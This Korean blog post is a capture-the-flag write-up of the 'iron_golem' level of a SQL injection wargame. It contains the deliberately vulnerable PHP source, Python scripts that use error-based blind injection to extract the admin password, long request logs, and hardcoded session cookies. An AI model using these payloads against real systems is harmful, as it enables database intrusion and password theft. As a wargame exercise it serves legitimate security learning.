
[Lord Of SQL Injection] 21번(error blind sql)

Kwon Oh! JUN 2022. 2. 12. 23:41

query : select id from prob_iron_golem where id='admin' and pw=''



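<?php
  // Challenge source for the "iron_golem" level, as printed by the page itself
  // via highlight_file(). It is intentionally vulnerable; the notes below mark
  // the weaknesses from a defender's point of view.
  // NOTE: $_GET[pw] (unquoted key) is kept as the challenge wrote it.
  include "./config.php";
  login_chk();
  $db = dbconnect();

  // Deny-list filters: reject "prob", "_", ".", "()" and the time-delay
  // functions sleep/benchmark. A deny-list only removes the listed keywords;
  // quotes and conditional expressions still pass, so this does not prevent
  // SQL injection.
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");

  // Root cause: the request parameter is interpolated directly into the SQL
  // text. The fix is a prepared statement with pw passed as a bound parameter.
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));

  // Information leak: the raw database error text is sent to the client, so
  // "error / no error" becomes a true/false signal for whoever controls the
  // query. Log the error server-side and return a generic message instead.
  if(mysqli_error($db)) exit(mysqli_error($db));

  // The query string (including user input) is echoed without HTML escaping;
  // output like this should go through htmlspecialchars().
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  // Second query: the input is escaped with addslashes() and the stored pw
  // must equal the submitted value, so the level is only marked solved when
  // the exact password is supplied.
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");

  highlight_file(__FILE__);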

 


기존과 다른게 있다면

  if(mysqli_error($db)) exit(mysqli_error($db));

첫 번째 쿼리에서 오류가 나면 DB 오류 메시지가 그대로 응답에 출력된다. 따라서 조건이 참일 때만 오류가 나도록 쿼리를 구성하면, 오류 발생 여부로 T/F를 구분해 원하는 값을 알아낼 수 있다.

 

import requests
import string

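# Target is a level of the "Lord of SQL Injection" practice wargame.
url = "https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
# NOTE: PHPSESSID is a login session credential. Avoid publishing a live
# value; load it from the environment or a local config file instead.
cookie = dict(PHPSESSID="qui93ljl9i3egjuv279au3d4qm")

# Try candidate lengths 1..99. When length(pw) equals i, the if() evaluates
# the two-row subquery, which makes the server return a subquery error.
for i in range(1, 100):
    param = f"?pw='or id='admin' and if(length(pw)={i},(select 1 union select 2), 1)%23"
    len_result = url + param
    # A timeout keeps one stalled connection from hanging the whole loop.
    response = requests.get(len_result, cookies=cookie, timeout=10)
    print(len_result)

    # On error the page body is only the error text, so the marker sits at
    # index 0; a membership test avoids the find() > 0 / >= 0 pitfall.
    if "Subquery" in response.text:
        print("password :"+str(i))
        break
else:
    # No candidate triggered the error: say so instead of ending silently.
    print("password length not found in range 1-99")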

pw의 길이를 알아내는 코드이다.

if(조건, 참, 거짓)

length(pw)=i 조건이 참이면 (select 1 union select 2) 서브쿼리가 평가되는데, 이 서브쿼리는 행을 두 개 반환하므로 서브쿼리 오류가 발생한다. 이 오류가 응답에 나타나는지로 조건이 참인지 알 수 있다.

*이전 코드와 다르게 response.text.find("Subquery") >= 0 처럼 크거나 같다는 조건을 쓴 이유는, 오류가 발생하면 화면에 출력되는 텍스트가 오류 메시지뿐이기 때문이다. find()는 찾은 위치(인덱스)를 반환하고 찾지 못하면 -1을 반환하는데, 오류 메시지가 "Subquery"로 시작하므로 첫 글자 "S"의 위치는 0이다. 따라서 > 0 을 사용하면 오류가 발생해도 조건이 거짓이 되어 원하는 값을 얻을 수 없다.

https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=1,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=2,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=3,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=4,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=5,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=6,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=7,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=8,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=9,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=10,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=11,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=12,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=13,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=14,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=15,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=16,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=17,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=18,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=19,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=20,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=21,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=22,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=23,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=24,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=25,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=26,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=27,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=28,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=29,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=30,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=31,(select 1 union select 2), 1)%23
https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw='or id='admin' and if(length(pw)=32,(select 1 union select 2), 1)%23
password :32

패스워드 길이 : 32


패스워드 값을 알아보면

import requests
import string


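# Target is a level of the "Lord of SQL Injection" practice wargame.
url = "https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
# NOTE: PHPSESSID is a login session credential. Avoid publishing a live
# value; load it from the environment or a local config file instead.
cookie = dict(PHPSESSID="qh6cd97grivfurvhcaobv2sqjt")

# Candidate characters: digits first, then ASCII letters.
asc = string.digits+string.ascii_letters
print(asc)
result=""

# Positions 1..32 (the length found by the previous script). For each
# position, the character is compared as a quoted string literal; a match
# makes the if() evaluate the two-row subquery and the server returns the
# subquery error.
for i in range(1, 33):
    for j in asc:
        param = f"?pw='or id='admin' and if(right(left(pw,{i}),1)='{j}',(select 1 union select 2),1)%23"
        # Alternative kept from the original: compare ASCII codes instead.
        #param = "?pw='or id='admin' and if(ord(substr(pw,"+str(i)+",1))="+str(ord(j))+",(select 1 union select 2), 1)%23"
        print(param)
        res_url = url + param
        # A timeout keeps one stalled connection from hanging the whole run.
        response = requests.get(res_url, cookies=cookie, timeout=10)

        # On error the page body is only the error text, so the marker sits
        # at index 0; a membership test avoids the find() > 0 / >= 0 pitfall.
        if "Subquery" in response.text:
            print(str(i)+"번째 패스워드 :"+j)
            result += j
            break
    else:
        # No candidate matched: mark the position so the result is not
        # silently shorter than expected.
        print(f"position {i}: no match in charset")
        result += "?"
print("pw :"+result)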
param = "?pw='or id='admin' and if(right(left(pw,"+str(i)+"),1)='"+str(j)+"',(select 1 union select 2),1)%23"
#param = "?pw='or id='admin' and if(ord(substr(pw,"+str(i)+",1))="+str(ord(j))+",(select 1 union select 2), 1)%23"
비교 대상: pw | str(j)
첫 번째 방식(right(left(...))): "문자열" | "문자열"
두 번째 방식(ord(substr(...))): "문자열" → 아스키코드 | "문자열" → 아스키코드

*처음에는 문자를 아스키코드로 바꿔서 비교하도록 코드를 짰었는데, 문득 굳이 아스키코드로 바꾸지 않아도 될 것 같아서 해 보니 동작하지 않았다. 찾아보니 right(left(...))=A 가 아니라 right(left(...))='A' 처럼 비교할 문자를 문자열로 표시해 줘야 했다(따옴표가 없으면 SQL에서 문자열이 아닌 식별자로 해석된다). 그래서 right(left(pw,"+str(i)+"),1)='"+str(j)+"' 와 같이 작은따옴표를 붙여 줬더니 정상적으로 작동했다.

?pw='or id='admin' and if(right(left(pw,1),1)='0',(select 1 union select 2),1)%23
1번째 패스워드 :0
?pw='or id='admin' and if(right(left(pw,2),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,2),1)='6',(select 1 union select 2),1)%23
2번째 패스워드 :6
?pw='or id='admin' and if(right(left(pw,3),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,3),1)='b',(select 1 union select 2),1)%23
3번째 패스워드 :b
?pw='or id='admin' and if(right(left(pw,4),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,4),1)='5',(select 1 union select 2),1)%23
4번째 패스워드 :5
?pw='or id='admin' and if(right(left(pw,5),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,5),1)='a',(select 1 union select 2),1)%23
5번째 패스워드 :a
?pw='or id='admin' and if(right(left(pw,6),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,6),1)='6',(select 1 union select 2),1)%23
6번째 패스워드 :6
?pw='or id='admin' and if(right(left(pw,7),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,7),1)='c',(select 1 union select 2),1)%23
7번째 패스워드 :c
?pw='or id='admin' and if(right(left(pw,8),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,8),1)='1',(select 1 union select 2),1)%23
8번째 패스워드 :1
?pw='or id='admin' and if(right(left(pw,9),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,9),1)='6',(select 1 union select 2),1)%23
9번째 패스워드 :6
?pw='or id='admin' and if(right(left(pw,10),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,10),1)='e',(select 1 union select 2),1)%23
10번째 패스워드 :e
?pw='or id='admin' and if(right(left(pw,11),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,11),1)='8',(select 1 union select 2),1)%23
11번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,12),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,12),1)='8',(select 1 union select 2),1)%23
12번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,13),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,13),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,13),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,13),1)='3',(select 1 union select 2),1)%23
13번째 패스워드 :3
?pw='or id='admin' and if(right(left(pw,14),1)='0',(select 1 union select 2),1)%23
14번째 패스워드 :0
?pw='or id='admin' and if(right(left(pw,15),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,15),1)='4',(select 1 union select 2),1)%23

16번째 패스워드 :7
?pw='or id='admin' and if(right(left(pw,17),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,17),1)='5',(select 1 union select 2),1)%23
17번째 패스워드 :5
?pw='or id='admin' and if(right(left(pw,18),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='e',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,18),1)='f',(select 1 union select 2),1)%23
18번째 패스워드 :f
?pw='or id='admin' and if(right(left(pw,19),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,19),1)='9',(select 1 union select 2),1)%23
19번째 패스워드 :9
?pw='or id='admin' and if(right(left(pw,20),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,20),1)='8',(select 1 union select 2),1)%23
20번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,21),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,21),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,21),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,21),1)='3',(select 1 union select 2),1)%23
21번째 패스워드 :3
?pw='or id='admin' and if(right(left(pw,22),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,22),1)='c',(select 1 union select 2),1)%23
22번째 패스워드 :c
?pw='or id='admin' and if(right(left(pw,23),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,23),1)='c',(select 1 union select 2),1)%23
23번째 패스워드 :c
?pw='or id='admin' and if(right(left(pw,24),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,24),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,24),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,24),1)='3',(select 1 union select 2),1)%23
24번째 패스워드 :3
?pw='or id='admin' and if(right(left(pw,25),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,25),1)='a',(select 1 union select 2),1)%23
25번째 패스워드 :a
?pw='or id='admin' and if(right(left(pw,26),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,26),1)='8',(select 1 union select 2),1)%23
26번째 패스워드 :8
?pw='or id='admin' and if(right(left(pw,27),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,27),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,27),1)='2',(select 1 union select 2),1)%23
27번째 패스워드 :2
?pw='or id='admin' and if(right(left(pw,28),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,28),1)='5',(select 1 union select 2),1)%23
28번째 패스워드 :5
?pw='or id='admin' and if(right(left(pw,29),1)='0',(select 1 union select 2),1)%23
